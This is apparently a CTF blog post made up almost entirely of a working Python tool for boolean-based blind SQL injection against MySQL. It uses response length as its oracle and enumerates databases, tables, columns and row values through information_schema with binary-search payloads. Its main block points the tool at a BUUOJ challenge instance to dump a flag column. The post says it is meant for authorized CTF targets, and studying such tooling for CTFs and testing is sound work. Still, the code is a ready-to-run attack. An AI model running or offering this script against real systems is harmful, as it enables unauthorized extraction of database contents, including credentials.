PS
闲得蛋疼,写了个盲注的脚本,最后发现还是sqlmap香
(Wrote a boolean-based blind SQL injection script out of boredom; in the end sqlmap is still the better tool. This is a CTF helper — only point it at targets you are authorized to test.)
import requests
# Boolean-based blind SQL injection script for MySQL (布尔盲注mysql脚本): TRUE/FALSE is inferred from the response length.
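# Baseline "normal page" size: the boolean oracle used by the whole script.
def resLen(url, timeout=10):
    """Fetch *url* and return the length of the response body.

    Every other helper compares this number with the baseline length of the
    un-injected page: equal length means the injected condition was TRUE.
    Pages whose size varies between requests (timestamps, nonces, ads) make
    that oracle unreliable; check the baseline is stable before trusting
    the results.

    Args:
        url: Complete URL, injected payload already appended to the query string.
        timeout: Seconds to wait for connect/read. ``requests`` has no default
            timeout, so without one a stalled target blocks the enumeration
            loops forever.

    Returns:
        Length of the decoded response text in characters.

    Raises:
        requests.RequestException: on connection errors or timeout.
    """
    res = requests.get(url, timeout=timeout)
    return len(res.text)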
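# Length of the current database name (database()).
def currdb_len(url, reslen=None, max_len=100):
    """Find ``length(database())`` by boolean blind injection.

    Sends ``1' and length(database())=<i> --+`` for i in 1..max_len-1 and
    reports the first i whose page length equals the baseline.

    Args:
        url: Target URL ending in the injectable parameter (e.g. ``...?id=``).
        reslen: Baseline page length. Fetched once with resLen(url) when None
            (the original re-fetched the baseline on every probe, doubling the
            request count and racing against page-size jitter).
        max_len: Exclusive upper bound of the length search.

    Returns:
        The matched length, or None when nothing in range matched (the
        original silently returned max_len-1 in that case).
    """
    if reslen is None:
        reslen = resLen(url)
    payload = "1' and length(database())="
    for i in range(1, max_len):
        if resLen(url + payload + str(i) + " --+") == reslen:
            print("当前数据库长度为: ", i)
            return i
    print("current database length not found in 1..%d" % (max_len - 1))
    return None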
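# Number of schemas visible in information_schema.schemata.
def db_count(url, reslen, max_count=100):
    """Find how many databases the injected user can see.

    Probes ``(select count(schema_name) from information_schema.schemata)=<i>``
    for i in 1..max_count-1.

    Args:
        url: Target URL ending in the injectable parameter.
        reslen: Baseline page length from resLen(url).
        max_count: Exclusive upper bound of the search.

    Returns:
        The matched count, or None when nothing in range matched (the
        original silently returned max_count-1, which then made db_len
        probe 99 non-existent schemas).
    """
    payload = "1' and (select count(schema_name) from information_schema.schemata)="
    for i in range(1, max_count):
        if resLen(url + payload + str(i) + " --+") == reslen:
            print("共有%d个数据库" % i)
            return i
    print("database count not found in 1..%d" % (max_count - 1))
    return None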
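# Length of every database name, one entry per schema in information_schema order.
def db_len(url, count, reslen, max_len=100):
    """Return the name length of each of the first *count* schemas.

    Probes ``length(schema_name)`` of ``limit i,1`` for i in 0..count-1.

    Args:
        url: Target URL ending in the injectable parameter.
        count: Number of schemas to examine (normally from db_count).
        reslen: Baseline page length from resLen(url).
        max_len: Exclusive upper bound of the length search.

    Returns:
        List of ints, ``result[i]`` being the name length of schema i. A
        schema whose length could not be found gets 0 so the list stays
        aligned with the schema index (the original skipped it, shifting
        every following entry and thus mis-reading names in db_name).
    """
    db = []
    for i in range(count):
        # Hoisted: the prefix only depends on the schema index, not on j.
        prefix = "1' and (select length(schema_name) from information_schema.schemata limit %d,1)=" % i
        for j in range(1, max_len):
            if resLen(url + prefix + str(j) + " --+") == reslen:
                print("第%d个数据库的长度为%d:" % (i + 1, j))
                db.append(j)
                break
        else:
            print("length of database %d not found in 1..%d" % (i + 1, max_len - 1))
            db.append(0)
    return db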
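# Recover every database name character by character (binary search on ascii()).
def db_name(url, db, reslen):
    """Return the schema names whose lengths are given in *db*.

    For schema index ``idx`` and character position ``pos`` the ascii value
    is located with ``ascii(substr(...)) > mid`` probes over the printable
    range 32..126, then checked with a single ``= value`` probe.

    Fixes relative to the original:
      * ``db.index(length)`` returned the first schema with that length, so
        two schemas of equal name length were both read from the first one;
        ``enumerate`` keeps the schema index correct.
      * ``start = mid`` never advanced when the true value was above the
        range (ascii >= 127, or NULL from a missing row), so the loop never
        terminated; the search now always ends and the confirm probe stops
        the name when the character is outside 32..126.
      * Each step sent the same ``>`` probe twice; it is now sent once.

    Args:
        url: Target URL ending in the injectable parameter.
        db: Name length per schema index, as produced by db_len.
        reslen: Baseline page length from resLen(url).

    Returns:
        List of names parallel to *db*. A name is truncated at the first
        character that could not be confirmed as printable ASCII.
    """
    dbname = []
    for idx, length in enumerate(db):
        sub = "(select schema_name from information_schema.schemata limit %d,1)" % idx
        name = ""
        for pos in range(1, length + 1):
            lo, hi = 32, 126
            # Invariant: if the character is printable ASCII it lies in [lo, hi].
            while lo < hi:
                mid = (lo + hi) // 2
                probe = "1' and ascii(substr({0},{1},1)) > {2} --+".format(sub, pos, mid)
                if resLen(url + probe) == reslen:
                    lo = mid + 1
                else:
                    hi = mid
            confirm = "1' and ascii(substr({0},{1},1)) = {2} --+".format(sub, pos, lo)
            if resLen(url + confirm) != reslen:
                print("database %d: character %d is not printable ASCII (or missing), stopping" % (idx + 1, pos))
                break
            name += chr(lo)
            print(name)
        dbname.append(name)
    return dbname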
#-----------------------------------------------------------------------------------------------------------------------------
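# Number of tables in a schema and the length of each table name.
def table_len(url, dbname, reslen, max_count=100, max_len=100):
    """Return the name length of every table in schema *dbname*.

    First probes ``count(table_name) ... where table_schema='<dbname>'`` for
    0..max_count-1, then ``length(table_name)`` of ``limit n,1`` per table.

    Args:
        url: Target URL ending in the injectable parameter.
        dbname: Schema name. It is spliced into the SQL between single quotes,
            so a name that itself contains a quote would break the payload.
        reslen: Baseline page length from resLen(url).
        max_count: Exclusive upper bound of the table-count search.
        max_len: Exclusive upper bound of the name-length search.

    Returns:
        List of ints, ``result[n]`` being the name length of table n. A table
        whose length was not found gets 0 so indices stay aligned for
        table_name. An empty list is returned when the count could not be
        determined (the original fell through with count 99).
    """
    count_payload = "1' and (select count(table_name) from information_schema.tables where table_schema='{0}')=".format(dbname)
    # Start at 0: a schema may legitimately contain no tables.
    for count in range(max_count):
        if resLen(url + count_payload + str(count) + " --+") == reslen:
            print("{0}数据库的表有{1}个".format(dbname, count))
            break
    else:
        print("table count of %s not found in 0..%d" % (dbname, max_count - 1))
        return []
    table = []
    for n in range(count):
        prefix = "1' and (select length(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)=".format(dbname, n)
        for j in range(1, max_len):
            if resLen(url + prefix + str(j) + " --+") == reslen:
                print("table %d of %s has a name of length %d" % (n + 1, dbname, j))
                table.append(j)
                break
        else:
            print("length of table %d in %s not found in 1..%d" % (n + 1, dbname, max_len - 1))
            table.append(0)
    return table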
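# Recover each table name of a schema, one character at a time.
def table_name(url, dbname, table, reslen):
    """Return the table names of schema *dbname* whose lengths are in *table*.

    Same oracle as db_name: ``ascii(substr(...)) > mid`` binary search over
    32..126 followed by one ``= value`` confirm probe per character.

    Fixes relative to the original: the search loop could never terminate
    for a character outside 32..126 (or a NULL from a missing row) because
    ``start = mid`` made no progress, and every step sent the ``>`` probe
    twice. The confirm probe now ends the name cleanly in that case.

    Args:
        url: Target URL ending in the injectable parameter.
        dbname: Schema name, spliced into the SQL between single quotes.
        table: Name length per table index, as produced by table_len.
        reslen: Baseline page length from resLen(url).

    Returns:
        List of names parallel to *table*, each truncated at the first
        character that could not be confirmed.
    """
    tablename = []
    for idx, length in enumerate(table):
        sub = "(select table_name from information_schema.tables where table_schema='{0}' limit {1},1)".format(dbname, idx)
        name = ""
        for pos in range(1, length + 1):
            lo, hi = 32, 126
            while lo < hi:
                mid = (lo + hi) // 2
                probe = "1' and ascii(substr({0},{1},1)) > {2} --+".format(sub, pos, mid)
                if resLen(url + probe) == reslen:
                    lo = mid + 1
                else:
                    hi = mid
            confirm = "1' and ascii(substr({0},{1},1)) = {2} --+".format(sub, pos, lo)
            if resLen(url + confirm) != reslen:
                print("table %d: character %d is not printable ASCII (or missing), stopping" % (idx + 1, pos))
                break
            name += chr(lo)
            print(name)
        tablename.append(name)
    return tablename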
#--------------------------------------------------------------------------
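# Number of columns in a table and the length of each column name.
def column_len(url, tablename, reslen, dbname=None, max_count=100, max_len=100):
    """Return the name length of every column of table *tablename*.

    Args:
        url: Target URL ending in the injectable parameter.
        tablename: Table name, spliced into the SQL between single quotes.
        reslen: Baseline page length from resLen(url).
        dbname: Optional schema name. information_schema.columns lists every
            table with that name in every schema, so without this filter a
            common name (``users``, ``note``) merges columns from several
            tables; pass the schema to restrict the lookup.
        max_count: Exclusive upper bound of the column-count search.
        max_len: Exclusive upper bound of the name-length search.

    Returns:
        List of ints, ``result[n]`` being the name length of column n; 0 for
        a column whose length was not found (keeps indices aligned for
        column_name). Empty list when the count could not be determined.
    """
    where = "table_name='{0}'".format(tablename)
    if dbname is not None:
        where += " and table_schema='{0}'".format(dbname)
    count_payload = "1' and (select count(column_name) from information_schema.columns where {0})=".format(where)
    for count in range(max_count):
        if resLen(url + count_payload + str(count) + " --+") == reslen:
            print("数据表{0}中的列有{1}个".format(tablename, count))
            break
    else:
        print("column count of %s not found in 0..%d" % (tablename, max_count - 1))
        return []
    column = []
    for n in range(count):
        prefix = "1' and (select length(column_name) from information_schema.columns where {0} limit {1},1)=".format(where, n)
        for j in range(1, max_len):
            if resLen(url + prefix + str(j) + " --+") == reslen:
                print("column %d of %s has a name of length %d" % (n + 1, tablename, j))
                column.append(j)
                break
        else:
            print("length of column %d in %s not found in 1..%d" % (n + 1, tablename, max_len - 1))
            column.append(0)
    return column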
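# Recover each column name of a table, one character at a time.
def column_name(url, tablename, column, reslen, dbname=None):
    """Return the column names of *tablename* whose lengths are in *column*.

    Same binary-search oracle as db_name/table_name, with the non-terminating
    loop and the duplicated ``>`` probe of the original fixed.

    Args:
        url: Target URL ending in the injectable parameter.
        tablename: Table name, spliced into the SQL between single quotes.
        column: Name length per column index, as produced by column_len.
        reslen: Baseline page length from resLen(url).
        dbname: Optional schema name; without it information_schema.columns
            matches every table of that name in every schema. Use the same
            value that was given to column_len so indices line up.

    Returns:
        List of names parallel to *column*, each truncated at the first
        character that could not be confirmed as printable ASCII.
    """
    where = "table_name='{0}'".format(tablename)
    if dbname is not None:
        where += " and table_schema='{0}'".format(dbname)
    columnname = []
    for idx, length in enumerate(column):
        sub = "(select column_name from information_schema.columns where {0} limit {1},1)".format(where, idx)
        name = ""
        for pos in range(1, length + 1):
            lo, hi = 32, 126
            while lo < hi:
                mid = (lo + hi) // 2
                probe = "1' and ascii(substr({0},{1},1)) > {2} --+".format(sub, pos, mid)
                if resLen(url + probe) == reslen:
                    lo = mid + 1
                else:
                    hi = mid
            confirm = "1' and ascii(substr({0},{1},1)) = {2} --+".format(sub, pos, lo)
            if resLen(url + confirm) != reslen:
                print("column %d: character %d is not printable ASCII (or missing), stopping" % (idx + 1, pos))
                break
            name += chr(lo)
            print(name)
        columnname.append(name)
    return columnname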
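# Row count of a table and the length of *columnname* in each row.
def data_len(url, columnname, dbname, tablename, reslen, max_count=100, max_len=100):
    """Return the value length of *columnname* for every row of dbname.tablename.

    The row count is taken with ``count(*)`` rather than the original
    ``count(<column>)``: ``count(col)`` skips NULLs while the per-row probe
    (``limit n,1``) walks every row, so with NULLs the two disagreed and the
    last rows were never read. Rows are addressed by ``limit n,1`` without
    ORDER BY; MySQL does not guarantee that order, so keep data_len and
    data_value on the same query shape (as here) for the indices to agree.

    Args:
        url: Target URL ending in the injectable parameter.
        columnname: Column to measure; spliced into the SQL unquoted.
        dbname: Schema name; spliced into the SQL unquoted.
        tablename: Table name; spliced into the SQL unquoted.
        reslen: Baseline page length from resLen(url).
        max_count: Exclusive upper bound of the row-count search.
        max_len: Exclusive upper bound of the value-length search.

    Returns:
        List of ints, ``result[n]`` being the length of the value in row n;
        0 when it was not found (e.g. a NULL value, whose length() is NULL),
        so that data_value yields "" for that row instead of shifting rows.
        Empty list when the row count could not be determined.
    """
    count_payload = "1' and (select count(*) from {0}.{1})=".format(dbname, tablename)
    for rows in range(max_count):
        if resLen(url + count_payload + str(rows) + " --+") == reslen:
            print("数据列{0}中的数据有{1}行".format(columnname, rows))
            break
    else:
        print("row count of %s.%s not found in 0..%d" % (dbname, tablename, max_count - 1))
        return []
    data = []
    for n in range(rows):
        prefix = "1' and (select length({0}) from {1}.{2} limit {3},1)=".format(columnname, dbname, tablename, n)
        # Start at 0: an empty string is a valid value.
        for j in range(max_len):
            if resLen(url + prefix + str(j) + " --+") == reslen:
                print("row %d: %s has length %d" % (n + 1, columnname, j))
                data.append(j)
                break
        else:
            print("length of %s in row %d not found in 0..%d" % (columnname, n + 1, max_len - 1))
            data.append(0)
    return data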
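# Recover the value of *columnname* in each row, one character at a time.
def data_value(url, columnname, dbname, tablename, data, reslen):
    """Return the value of *columnname* for each row whose length is in *data*.

    Per character: binary search over printable ASCII 32..126 with
    ``ascii(substr(...)) > mid`` probes, then one ``= value`` confirm probe.
    ``ascii()`` returns the first byte of a multi-byte character, so a value
    with non-ASCII content is cut off at that point instead of looping
    forever as the original did (``start = mid`` never advanced past 126).

    Args:
        url: Target URL ending in the injectable parameter.
        columnname: Column to read; spliced into the SQL unquoted.
        dbname: Schema name; spliced into the SQL unquoted.
        tablename: Table name; spliced into the SQL unquoted.
        data: Value length per row index, as produced by data_len.
        reslen: Baseline page length from resLen(url).

    Returns:
        List of strings parallel to *data*, each truncated at the first
        character that could not be confirmed.
    """
    datavalue = []
    for idx, length in enumerate(data):
        sub = "(select {0} from {1}.{2} limit {3},1)".format(columnname, dbname, tablename, idx)
        name = ""
        for pos in range(1, length + 1):
            lo, hi = 32, 126
            while lo < hi:
                mid = (lo + hi) // 2
                probe = "1' and ascii(substr({0},{1},1)) > {2} --+".format(sub, pos, mid)
                if resLen(url + probe) == reslen:
                    lo = mid + 1
                else:
                    hi = mid
            confirm = "1' and ascii(substr({0},{1},1)) = {2} --+".format(sub, pos, lo)
            if resLen(url + confirm) != reslen:
                print("row %d: character %d is not printable ASCII (or missing), stopping" % (idx + 1, pos))
                break
            name += chr(lo)
            print(name)
        datavalue.append(name)
    return datavalue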
if __name__ == "__main__":
    # Target: a BUUOJ challenge instance; ``id`` is the injectable parameter
    # and the payloads assume a single-quoted string context in MySQL.
    url = "http://70fb105f-c8ca-4166-b991-610732d01442.node4.buuoj.cn:81?id="
    # Baseline page length: the oracle every probe is compared against.
    reslen = resLen(url)
    # Full enumeration chain, already run by hand for this target and kept
    # here only as a record (database "note", tables fl4g/note, column
    # fllllag):
    #   count     = db_count(url, reslen)
    #   db        = db_len(url, count, reslen)
    #   dbname    = db_name(url, db, reslen)
    #   table     = table_len(url, "note", reslen)
    #   tablename = table_name(url, "note", table, reslen)
    #   column    = column_len(url, "fl4g", reslen)
    #   columnname = column_name(url, "fl4g", column, reslen)
    # Only the final step is live: dump column fllllag of note.fl4g.
    data = data_len(url, 'fllllag', 'note', 'fl4g', reslen)
    print(data)
    datavalue = data_value(url, 'fllllag', 'note', 'fl4g', data, reslen)
    print(datavalue)